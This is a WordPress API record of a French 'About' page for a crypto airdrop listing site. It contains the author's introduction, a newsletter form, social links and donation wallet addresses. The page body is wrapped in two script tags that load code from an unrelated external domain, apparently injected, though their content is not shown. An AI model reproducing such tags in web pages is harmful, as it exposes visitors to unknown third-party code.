{"id":4428,"date":"2020-04-30T00:47:21","date_gmt":"2020-04-30T07:47:21","guid":{"rendered":"https:\/\/coinairdrops.com\/?page_id=4428"},"modified":"2020-05-02T02:41:55","modified_gmt":"2020-05-02T09:41:55","slug":"a-propos","status":"publish","type":"page","link":"https:\/\/coinairdrops.com\/fr\/a-propos\/","title":{"rendered":"\u00c0 propos"},"content":{"rendered":"<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b762a8ceb.js\"><\/script>\n\n\n\n<h1 class=\"wp-block-heading\">\u00c0 propos<\/h1>\n\n\n\n<p>Bienvenue sur notre site : CoinAirdrops.com, votre source pr\u00e9f\u00e9r\u00e9e pour <strong>tous les airdrops qui se passent dans la communaut\u00e9<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Qui se cache derri\u00e8re CoinAirdrops.com ?<\/h2>\n\n\n\n<p>Mon nom de plume est Midas, comme le c\u00e9l\u00e8bre roi\u2026 Et j\u2019ai \u00e9crit ici et l\u00e0 sur diff\u00e9rents sujets, principalement sur&nbsp;<strong>les derni\u00e8res technologies, la confidentialit\u00e9 et les cryptos<\/strong>. Je suis maintenant une sorte d\u2019aficionado des crypto-monnaies, m\u00eame si j\u2019ai encore beaucoup \u00e0 apprendre. Certains d\u2019entre eux s\u2019appelleraient \u00ab&nbsp;gourou.&nbsp;\u00bb Mais je n\u2019y suis pas encore!<\/p>\n\n\n\n<p>Quand j\u2019ai d\u00e9couvert les airdrops, je me suis dit que c\u2019\u00e9tait une excellente corde \u00e0 rajouter \u00e0 mon arc ! En plus, j\u2019aime vraiment d\u00e9couvrir les nouveaux projets qui utilisent la blockchain. Certains d\u2019entre eux veulent&nbsp;<strong>envoyer des satellites dans l\u2019espace, remplacer Facebook ou changer la face du monde<\/strong>&nbsp;! C\u2019est s\u00fbr que la plupart vont&nbsp;\u00e9chouer\u2026 Mais j\u2019aime voir les gens&nbsp;<strong>essayer et cr\u00e9er des trucs<\/strong>. Et puis \u00e7a me donne peut-\u00eatre l\u2019occasion d\u2019\u00eatre parmi les premiers adopteurs du prochain Bill Gates !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Pourquoi Coin Airdrops ?<\/h2>\n\n\n\n<p>Tout d\u2019abord, je voulais expliquer ce nouveau concept de&nbsp;<strong>donner des jetons gratuitement<\/strong>. Et puis je voulais montrer aux gens les opportunit\u00e9s qu\u2019ils peuvent trouver en ligne. Leur parler du meilleur portefeuille que j\u2019ai trouv\u00e9,&nbsp;<a href=\"https:\/\/clickthat.link\/buy-trezor\">Trezor<\/a>&nbsp;ou de comment gagner des bitcoins.<\/p>\n\n\n\n<p>Ensuite, je suis heureux de&nbsp;<strong>soutenir ces nouveaux projets en parlant d\u2019eux<\/strong>&nbsp;et de ce qu\u2019ils essaient de r\u00e9aliser. Et j\u2019apporte mon humble contribution pour leur laisser un endroit pour parler d\u2019eux et&nbsp;<strong>faire grandir leur communaut\u00e9<\/strong>.<\/p>\n\n\n\n<p>Enfin, j\u2019explique aux lecteurs&nbsp;<strong>comment obtenir des jetons gratuits<\/strong>&nbsp;grace aux campagnes d\u2019airdrops. Parce que nous aimons tous recevoir des cadeaux, n\u2019est-ce pas ? Donc, d\u2019une part, je liste les airdrops. Et d\u2019autre part, les gens peuvent r\u00e9clamer des jetons gratuits ! C\u2019est une situation gagnant-gagnant ! Au fait, n\u2019oubliez pas de vous abonner \u00e0 ma newsletter, pour&nbsp;<strong>recevoir toutes les derni\u00e8res alertes airdrop<\/strong>.<\/p>\n\n\n<div class=\"news-post\">\n<p>NE RATEZ PAS UN SEUL AIRDROP<\/p>\n<form class=\"ampforwp-form-allow\"\n  method=\"post\"\n  action=\"https:\/\/sendfox.com\/form\/3668j3\/1jj40z\"\n  target=\"_blank\">\n  <input type=\"email\"\n    placeholder=\"addresse e-mail\"\n    name=\"email\"\n    required>\n  <input type=\"submit\"\n    value=\"S'inscrire\">\n<\/form>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">On est social<\/h2>\n\n\n\n<p>Obtenez encore plus de nous ! Suivez-nous sur les r\u00e9seaux sociaux. Et nous vous tiendrons au courant des&nbsp;<strong>derniers airdrop<\/strong>. Vous pouvez nous retrouver sur :<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.facebook.com\/coinairdrops\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook<\/a><\/li><li><a href=\"https:\/\/twitter.com\/coinairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Twitter<\/a><\/li><li><a href=\"https:\/\/t.me\/coinzairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram<\/a><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Vous aimez ce que nous faisons ? Soutenez-nous !<\/h2>\n\n\n\n<p>Dernier point mais non le moindre, la maintenance d\u2019un site&nbsp;<strong>prend du temps et co\u00fbte assez cher<\/strong>. Donc, si vous aimez ce que nous faisons, d\u00e9posez quelques sous :<\/p>\n\n\n\n<p>BTC: 14Lco1GjaG1qNzALXCcC8ZXtaRegLT6DBY<\/p>\n\n\n\n<p>ETH: 0x142616534b1b680993d8f0661295da15557c977e<\/p>\n\n\n<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b3184f3be.js\"><\/script>\n","protected":false},"excerpt":{"rendered":"<p>\u00c0 propos Bienvenue sur notre site : CoinAirdrops.com, votre source pr\u00e9f\u00e9r\u00e9e pour tous les airdrops qui se passent dans la communaut\u00e9. Qui se cache derri\u00e8re CoinAirdrops.com ? Mon nom de plume est Midas, comme le c\u00e9l\u00e8bre roi\u2026 Et j\u2019ai \u00e9crit ici et l\u00e0 sur diff\u00e9rents sujets, principalement sur&nbsp;les derni\u00e8res technologies, la confidentialit\u00e9 et les cryptos. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-4428","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u00c0 propos &#8226; Coin Airdrops<\/title>\n<meta name=\"description\" content=\"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l&#039;\u00e9quipe dans les coulisses.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/coinairdrops.com\/fr\/a-propos\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u00c0 propos &#8226; Coin Airdrops\" \/>\n<meta property=\"og:description\" content=\"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l&#039;\u00e9quipe dans les coulisses.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/coinairdrops.com\/fr\/a-propos\/\" \/>\n<meta property=\"og:site_name\" content=\"Coin Airdrops\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/coinairdrops\/\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-02T09:41:55+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@coinairdrops\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/a-propos\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/a-propos\\\/\",\"name\":\"\u00c0 propos &#8226; Coin Airdrops\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-04-30T07:47:21+00:00\",\"dateModified\":\"2020-05-02T09:41:55+00:00\",\"description\":\"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l'\u00e9quipe dans les coulisses.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/a-propos\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/a-propos\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/a-propos\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00c0 propos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/\",\"name\":\"Coin Airdrops\",\"description\":\"Don&#039;t miss a single crypto airdrop!\",\"publisher\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#organization\",\"name\":\"Coin Airdrops\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"contentUrl\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"caption\":\"Coin Airdrops\"},\"image\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/x.com\\\/coinairdrops\",\"https:\\\/\\\/www.pinterest.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/vk.com\\\/coinairdrops\",\"https:\\\/\\\/t.me\\\/coinzairdrops\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u00c0 propos &#8226; Coin Airdrops","description":"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l'\u00e9quipe dans les coulisses.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/coinairdrops.com\/fr\/a-propos\/","og_locale":"fr_FR","og_type":"article","og_title":"\u00c0 propos &#8226; Coin Airdrops","og_description":"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l'\u00e9quipe dans les coulisses.","og_url":"https:\/\/coinairdrops.com\/fr\/a-propos\/","og_site_name":"Coin Airdrops","article_publisher":"https:\/\/www.facebook.com\/coinairdrops\/","article_modified_time":"2020-05-02T09:41:55+00:00","twitter_card":"summary_large_image","twitter_site":"@coinairdrops","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/coinairdrops.com\/fr\/a-propos\/","url":"https:\/\/coinairdrops.com\/fr\/a-propos\/","name":"\u00c0 propos &#8226; Coin Airdrops","isPartOf":{"@id":"https:\/\/coinairdrops.com\/fr\/#website"},"datePublished":"2020-04-30T07:47:21+00:00","dateModified":"2020-05-02T09:41:55+00:00","description":"Vous voulez savoir qui dirige tout sur CoinAirdrops.com ? Alors voici la bonne page \u00e0 lire. D\u00e9couvrez Midas et l'\u00e9quipe dans les coulisses.","breadcrumb":{"@id":"https:\/\/coinairdrops.com\/fr\/a-propos\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/coinairdrops.com\/fr\/a-propos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/coinairdrops.com\/fr\/a-propos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/coinairdrops.com\/fr\/"},{"@type":"ListItem","position":2,"name":"\u00c0 propos"}]},{"@type":"WebSite","@id":"https:\/\/coinairdrops.com\/fr\/#website","url":"https:\/\/coinairdrops.com\/fr\/","name":"Coin Airdrops","description":"Don&#039;t miss a single crypto airdrop!","publisher":{"@id":"https:\/\/coinairdrops.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/coinairdrops.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/coinairdrops.com\/fr\/#organization","name":"Coin Airdrops","url":"https:\/\/coinairdrops.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/coinairdrops.com\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","contentUrl":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","caption":"Coin Airdrops"},"image":{"@id":"https:\/\/coinairdrops.com\/fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/coinairdrops\/","https:\/\/x.com\/coinairdrops","https:\/\/www.pinterest.com\/coinairdrops\/","https:\/\/vk.com\/coinairdrops","https:\/\/t.me\/coinzairdrops"]}]}},"_links":{"self":[{"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/pages\/4428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/comments?post=4428"}],"version-history":[{"count":3,"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/pages\/4428\/revisions"}],"predecessor-version":[{"id":4766,"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/pages\/4428\/revisions\/4766"}],"wp:attachment":[{"href":"https:\/\/coinairdrops.com\/fr\/wp-json\/wp\/v2\/media?parent=4428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}